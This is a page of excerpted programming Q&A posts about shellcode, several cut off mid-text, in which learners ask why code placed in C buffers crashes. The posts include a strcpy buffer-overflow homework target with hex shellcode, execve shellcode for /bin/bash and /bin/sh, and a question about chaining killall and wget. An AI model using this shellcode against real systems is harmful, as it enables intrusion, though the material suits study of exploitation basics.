shellcode

asm shellcode in C buffer - prologue

拥有回忆 submitted on 2019-12-19 10:48:25
Question: I try to build a function in a buffer in C. With gdb I can translate push rbp mov rbp,rsp (...) leave ret to 0x55 0x48 0x89 0xe5 (...) 0xc9 0xc3 So I wrote a C code: int main() { char buffer[]={0x55,0x48,0x89,0xe5,0xc9,0xc3}; void (*j)(void)=buffer; j(); } but my program seems to crash at the instruction "push rbp" (0x55 in the buffer). Do you know why? Answer 1: The usual cause is that the stack (where your buffer is stored) is not executable. There are primarily two ways around that: compile/link

Linux's security measures against executing shellcode

南楼画角 submitted on 2019-12-19 10:25:21
Question: I'm learning the basics of computer security and I'm trying to execute some shellcode I've written. I followed the steps given here http://dl.packetstormsecurity.net/papers/shellcode/own-shellcode.pdf http://webcache.googleusercontent.com/search?q=cache:O3uJcNhsksAJ:dl.packetstormsecurity.net/papers/shellcode/own-shellcode.pdf+own+shellcode&cd=1&hl=nl&ct=clnk&gl=nl $ cat pause.s xor %eax,%eax mov $29,%al int $0x80 $ as -o pause.o pause.s $ ld -o pause pause.o ld: warning: cannot find entry

Homework - Cannot exploit buffer overflow

懵懂的女人 submitted on 2019-12-19 03:24:39
Question: I am trying to learn to exploit a simple buffer overflow technique on Backtrack Linux. Here is my C program #include <stdio.h> #include <string.h> int main(int argc, char **argv) { char buffer[500]; if(argc==2) { strcpy(buffer, argv[1]); //vulnerable function } return 0; } This is the shellcode I am using, which corresponds to a simple /bin/ls \x31\xc0\x83\xec\x01\x88\x04\x24\x68\x6e\x2f\x6c\x73\x66\x68\x62\x69\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80

How to get c code to execute hex bytecode?

|▌冷眼眸甩不掉的悲伤 submitted on 2019-12-18 11:19:13
Question: I want a simple C method to be able to run hex bytecode on a 64-bit Linux machine. Here's the C program that I have: char code[] = "\x48\x31\xc0"; #include <stdio.h> int main(int argc, char **argv) { int (*func) (); func = (int (*)()) code; (int)(*func)(); printf("%s\n","DONE"); } The code that I am trying to run ( "\x48\x31\xc0" ) I obtained by writing this simple assembly program (it's not supposed to really do anything) .text .globl _start _start: xorq %rax, %rax and then compiling and

Loading raw code from C program

匆匆过客 submitted on 2019-12-17 16:28:00
Question: I'm writing a program that loads and executes code from a file. But I got a problem: the "write" syscall does not work. The code successfully loads and executes, but does not display any text on the screen. Program that loads the code: #include <stdio.h> #include <stdlib.h> int main(int argc,char* argv[]) { unsigned int f_size = 0; unsigned char* code_buf = NULL; void (*func_call)(void) = NULL; if(argc < 2) { printf("Usage: %s <FILE>\n",argv[0]); return 1; } FILE* fp = fopen(argv[1],"rb"); if(!fp) {

What does this invocation of a char array cast as a function do?

ぐ巨炮叔叔 submitted on 2019-12-17 14:53:44
Question: I came across this piece of code: char code[] = "\xb0\x01\x31\xdb\xcd\x80"; int main(int argc, char **argv) { int (*func)(); func = (int (*)()) code; (int)(*func)(); } It is copied from Writing Shellcode for Linux and Windows Tutorial. Could someone explain what this function invocation (int)(*func)(); is doing? Answer 1: It calls a function whose machine code is in the array code. The string contains some machine-level instructions (three, I think; have a look at the x86 instruction set). func

execve shellcode writing segmentation fault

断了今生、忘了曾经 submitted on 2019-12-17 04:07:20
Question: I am trying to study execve shellcode, OS: Linux bt 2.6.39.4 root@bt:~/exploit# cat gshell.s .globl _start _start: nop jmp MyString shell: popl %esi xorl %eax,%eax movl %al,9(%esi) movl %esi,10(%esi) movl %eax,14(%esi) movb $11,%al movl %esi, %ebx leal 0xa(%esi),%ecx leal 0xe(%esi),%edx int $0x80 movl $1,%eax movl $0,%ebx int $0x80 MyString: call shell shellvar: .ascii "/bin/bashADDDDCCCC" root@bt:~/exploit# as -gstabs -o gshell.o gshell.s root@bt:~/exploit# ld -o gshell gshell.o root@bt:~

I want to convert x86 Linux shellcode with system calls to ARM Linux system calls

强颜欢笑 submitted on 2019-12-13 10:29:56
Question: I want to convert Intel x86 assembly code to ARM. I do not know how to use the stack. I wrote a call to execve using an int 0x80 system call for 32-bit x86 Linux. However, ARM uses svc or swi. But I do not know how to use something like this: push 0x0068732f and push 0x6e69622f .globl main main: push 0x0068732f push 0x6e69622f mov edx, 0 mov ecx, 0 mov ebx, esp mov eax, 11 int 0x80 mov ebx, 0 mov eax, 1 int 0x80 The syscall on ARM expects to use the swi to look like this: .global _start

Shellcode: perform 2 execve() calls

独自空忆成欢 submitted on 2019-12-12 21:21:54
Question: I am trying to write shellcode in assembly. I need to perform a /usr/bin/killall command AND a /usr/bin/wget command. I have both commands running perfectly in shellcode with the execve() syscall. But now I want to combine these 2, but this is not possible because the program exits when the first execve() call is executed. (From the man pages of execve(): execve() does not return on success.) How can I perform 2 execve() calls? Or is there another way to call both /usr/bin/killall and /usr

Write buffer overflow exploit — how to figure out the address of the shellcode?

眉间皱痕 submitted on 2019-12-12 16:10:40
Question: When writing a buffer overflow exploit, I understand that I'll need to input an array of length (address_of_return_address - address_of_buffer). And the array needs to be filled with the address of the shellcode. So that when my input array overflows, it overwrites the saved return address with the address of the shellcode. I think since the shellcode will be stored above the saved return address on the stack, its address should be address_of_return_address + the distance to the beginning of